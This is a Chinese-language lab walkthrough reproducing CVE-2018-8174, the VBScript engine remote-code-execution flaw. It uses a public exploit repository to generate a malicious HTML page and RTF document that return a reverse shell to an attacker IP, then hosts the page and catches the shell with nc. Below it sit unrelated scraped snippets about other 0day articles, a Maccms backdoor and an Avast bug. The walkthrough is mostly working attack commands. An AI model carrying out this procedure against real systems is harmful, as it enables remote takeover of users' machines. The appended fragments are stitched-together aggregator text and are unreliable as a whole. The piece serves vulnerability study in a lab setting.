双杀 0day 漏洞(CVE-2018-8174)复现

漏洞描述:

CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。

微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174

由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

漏洞复现:

攻击机 IP:192.168.220.160

靶机 IP:192.168.220.161

项目地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

┌─[[email protected]]─[/sch01ar]
└──? #git clone https://github.com/Sch01ar/CVE-2018-8174_EXP

ls 看一下

生成带有恶意 VBscript 的 html 页面和 word 文档

┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP]
└──? #python CVE-2018-8174.py -u http://192.168.220.160/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444

-u:URL 地址

-o:生成文档

-i:监听地址

-p:监听端口

查看一下生成的文件

把 explot.html 复制到 /var/www/html,并开启 apache 服务

┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP]
└──? #cp exploit.html /var/www/html
┌─[[email protected]]─[/sch01ar/CVE-2018-8174_EXP]
└──? #service apache2 start

用 nc 监听 4444 端口

用靶机的 IE 浏览器打开恶意 URL

攻击机收到靶机的 shell 会话

在靶机用 word 打开 msf.rtf

攻击机同样也收到会话

原文地址:https://www.cnblogs.com/sch01ar/p/9175578.html

时间: 2024-10-09 19:30:00

双杀 0day 漏洞(CVE-2018-8174)复现的相关文章

XP停服后首个IE 0day漏洞攻击样本曝光 360国内独家可检出

图注:VirusTotal网站截图 中国经济网北京5月1日讯 5月1日消息,上周六微软通报了XP停服后首个IE 0day漏洞,近日针对该漏洞的攻击样本又被国内安全论坛和在线杀毒扫描平台VirusTotal曝出,根据在线杀毒扫描平台VirusTotal 检测结果显示,截至2014年5月1日晚10点,全球仅有5家杀毒软件厂商可以检出该攻击样本,而360是其中唯一一家来自中国的杀毒软件厂商 VirusTotal检测结果显示,在52家全球杀毒软件产品中,目前仅有AntiVir(小红伞).卡巴斯基.微软(

20155306 白皎 0day漏洞——漏洞利用原理之栈溢出利用

20155306 白皎 0day漏洞--漏洞利用原理之栈溢出利用 一.系统栈的工作原理 1.1内存的用途 根据不同的操作系统,一个进程可能被分配到不同的内存区域去执行.但是不管什么样的操作系统.什么样的计算机架构,进程使用的内存都可以按照功能大致分为以下4个部分: 代码区:这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指并执行. 数据区:用于存储全局变量等. 堆区:进程可以在堆区动态地请求一定大小的内存,并在用完之后归还给堆区.动态分配和回收是堆区的特点. 栈区:用于动态地存储函

20155306 白皎 0day漏洞——漏洞利用原理之GS

20155306 白皎 0day漏洞--漏洞利用原理之GS 一.GS安全编译选项的保护原理 1.1 GS的提出 在第二篇博客(栈溢出利用)中,我们可以通过覆盖函数的返回地址来进行攻击,面对这个重灾区,Windows在VS 7.0(Visual Studio 2003)及以后版本的Visual Studio中默认启动了一个安全编译选项--GS(针对缓冲区溢出时覆盖函数返回地址这一特征),来增加栈溢出的难度. 1.2 GS的工作原理 GS编译选项为每个函数调用增加了一些额外的数据和操作,用以检测栈中

20155306 白皎 免考实践总结——0day漏洞

本次免考实践提纲及链接 第一部分 基础知识 1.1 0day漏洞概述 1.2二进制文件概述 1.3 必备工具 第二部分 漏洞利用 2.1栈溢出利用 2.1.1 系统栈工作原理 2.1.2 修改邻接变量 2.1.3 修改函数返回地址 2.1.4 代码植入 2.2 DEP 2.2.1 DEP机制的保护原理 2.2.2 linux下利用Ret2Lib绕过DEP 2.2.3 windows下利用Ret2Libc绕过DEP 2.3 GS 2.3.1 GS安全编译选项的保护原理 2.3.2 利用未被保护的内

10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现

Maccms后门分析 maccms网站基于php+mysql的系统,易用性.功能良好等优点,用途范围广 打开源码,extend\Qcloud\Sms\Sms.php.extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 二者代码相同) <?php error_reporting(E_ERROR);//报错 @ini_set('display_errors','Off'); @ini_set('max_executio

杀毒软件Avast被曝严重的0day漏洞

Google安全专家Tavis Ormandy,发现一个Avast杀毒软件的0day漏洞,该漏洞可能导致攻击者侵入用户电脑,并在用户电脑上执行恶意代码. Tavis Ormandy近期在Avast杀毒软件上发现了一个严重的0day漏洞.而就在上个月,也正是他发现了卡巴斯基上的0day漏洞.根据Ormandy的研究,新发现的这个0day漏洞,会在用户通过https访问网页的时候自我执行. Avast 0day 漏洞的发现 因为Avast可以针对加密的流量进行威胁扫描,但是却是用一种错误的方法来解析

CVE-2014-4113:飓风熊猫(HURRICANE PANDA)Win64bit提权0day漏洞

飓风熊猫被认为是原产于中国.主要针对基础设施公司的先进攻击者.我们知道它们除了拥有0day漏洞外,还有其他的三种本地特权提升漏洞.我们知道飓风熊猫使用的是"ChinaChopper"Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种密码破解工具获得目标访问的合法凭证. 本地实验结果 使用0sayTest.exe cmd命令后,打开的权限从原来的xiaoju变成了system.

0day漏洞

0Day的概念最早用于软件和游戏破解,属于非盈利性和非商业化的组织行为,其基本内涵是"即时性". Warez被许多人误认为是一个最大的软件破解组 织,而实际上,Warez如黑客一样,只是一种行为. 0Day也是.当时的0Day是指在正版软件或游戏发布的当天甚至之前,发布附带着序列号或者解密器 的破解版,让使用者可以不用付费就能长期使用. 因此,虽然Warez和0Day都是反盗版的重要打击对象,却同时受到免费使用者和业内同行的推崇.尽管 Warez和0Day的拥护者对以此而谋利的盗版商不

揭秘家用路由器0day漏洞挖掘技术——互动出版网

这篇是计算机类的优质预售推荐>>>><揭秘家用路由器0day漏洞挖掘技术> 全球第一本关于家用路由器底层安全分析的书籍! 编辑推荐 全球第一本硬件安全分析书籍,填补了硬件安全领域的空白:带领大家进入HT团队都还未涉及的领域!作者十年磨一剑之心血力作! <揭秘家用路由器0day漏洞挖掘技术>针对当下网络安全设备问题层出不穷.而系统化的安全分析资料越来越难寻的现状,从家用路由器入手,全方位的讲解了路由器漏洞分析.漏洞挖掘.路由器固件提取.硬件调试等方面的相关知识